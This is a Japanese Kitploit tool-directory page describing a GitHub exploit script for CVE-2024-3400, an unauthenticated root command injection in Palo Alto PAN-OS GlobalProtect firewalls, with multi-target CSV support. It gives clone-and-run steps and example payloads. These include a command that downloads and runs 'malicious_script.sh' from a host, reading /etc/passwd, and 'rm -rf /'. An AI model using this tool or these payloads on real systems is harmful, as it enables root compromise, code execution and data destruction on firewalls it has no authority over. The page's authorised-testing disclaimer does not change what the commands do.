Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2024-3400 — CVE-2024-3400のエクスプロイトスクリプト。PAN-OS GlobalProtectにおけるコマンドインジェクションで、認証なしのリモートコード実行をroot権限で可能にします。単一ターゲットおよびCSVベースの複数ターゲットのエクスプロイトに対応しています。 | Kitploit
ツール/GitHubGitHub/yuvvi01/cve-2024-3400
脆弱性分析エクスプロイトウェブアプリケーション悪用ペネトレーションテストコマンド&コントロールレッドチーミング
GitHubyuvvi01/cve-2024-3400

CVE-2024-3400

CVE-2024-3400のエクスプロイトスクリプト。PAN-OS GlobalProtectにおけるコマンドインジェクションで、認証なしのリモートコード実行をroot権限で可能にします。単一ターゲットおよびCSVベースの複数ターゲットのエクスプロイトに対応しています。

リポジトリを見る
11512年前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

PAN-OS ファイアウォール エクスプロイト スクリプト

このスクリプトは、PAN-OS ファイアウォールの脆弱性を悪用するデモを目的としています。特別に細工されたペイロードをファイアウォールのAPIエンドポイントに送信し、任意のコマンドを実行します。このエクスプロイトは、特定のPAN-OSバージョン向けのPalo Alto Networks PAN-OSソフトウェアのGlobalProtect機能におけるコマンドインジェクションの脆弱性であるCVE-2024-3400を標的にしています。特定の機能構成により、認証されていない攻撃者がファイアウォール上でroot権限で任意のコードを実行できる可能性があります。

注: このスクリプトは、法的かつ倫理的な目的でのみ、テストする許可を得たマシンでのみ使用してください。

使用法

このプロジェクトを使用するには、次の手順に従ってください:

  1. このリポジトリをクローンします:
    root@kitploit:~
    git clone https://github.com/Yuvvi01/CVE-2024-3400
    
    
  2. リポジトリのディレクトリに移動します:
    root@kitploit:~
    cd CVE-2024-3400
    
    
  3. 必要なモジュールをインストールします:
    root@kitploit:~
    pip install -r requirements.txt
    
    
  4. Pythonスクリプトを実行します:
    root@kitploit:~
    python3 exploit.py
    

プロンプトに従って、脆弱なPAN-OSファイアウォールのIPアドレスと実行するペイロードを入力します。

ペイロードの例

  1. ディレクトリの内容を一覧表示:
    root@kitploit:~
    ls -la
    
    
  • 特定のファイルの内容を表示:
    root@kitploit:~
    cat /etc/passwd
    
    
  • 現在ログインしているユーザーのユーザー名を表示:
    root@kitploit:~
    whoami
    
    
  • インターネットからファイルをダウンロード(wgetまたはcurlがインストールされている必要があります):
    root@kitploit:~
    wget http://example.com/malicious_script.sh -O /tmp/malicious_script.sh && chmod +x /tmp/malicious_script.sh && /tmp/malicious_script.sh
    
    
  • これは非常に注意してください:
    root@kitploit:~
    rm -rf /
    
  • 安全な使用のための手順

    SSL証明書の検証

    スクリプトは、PAN-OSファイアウォールサーバーからSSL証明書のファイルパスを尋ねます。パスが指定されていない場合、スクリプトは自動的にSSL検証をfalseに設定し、実質的にSSLを無効にします。

    CSVファイルの手順

    このスクリプトを使用すると、CSVファイルを使って脆弱なPAN-OSファイアウォールの複数のターゲットを悪用できます。以下は、CSVファイルを正しくフォーマットするための手順です:

    CSVファイルの形式

    CSVファイルには3つの列が必要です:

    ipaddress: 脆弱なPAN-OSファイアウォールのIPアドレス。 payload: ファイアウォール上で実行するペイロード。 path/to/root_CA_certificate.pem: ルートCA証明書へのパス(証明書検証が無効の場合は空白のままにします)。

    • CSVファイルの例:
      root@kitploit:~
      ipaddress,payload,path/to/root_CA_certificate.pem
      192.168.1.1,exploit_payload1,/path/to/certificate.pem
      192.168.1.2,exploit_payload2,
      

    手順:

    指定された形式でCSVファイルを作成します。 IPアドレス、ペイロード、およびルートCA証明書のパス(該当する場合)を入力します。 ルートCA証明書への有効なパスを指定するか、証明書検証が無効の場合はフィールドを空白のままにしてください。 スクリプトを実行し、プロンプトが表示されたらCSVファイルを使用するオプションを選択します。

    参考文献

    • https://www.bleepingcomputer.com/news/security/palo-alto-networks-warns-of-pan-os-firewall-zero-day-used-in-attacks/
    • https://security.paloaltonetworks.com/CVE-2024-3400
    ツールをダウンロード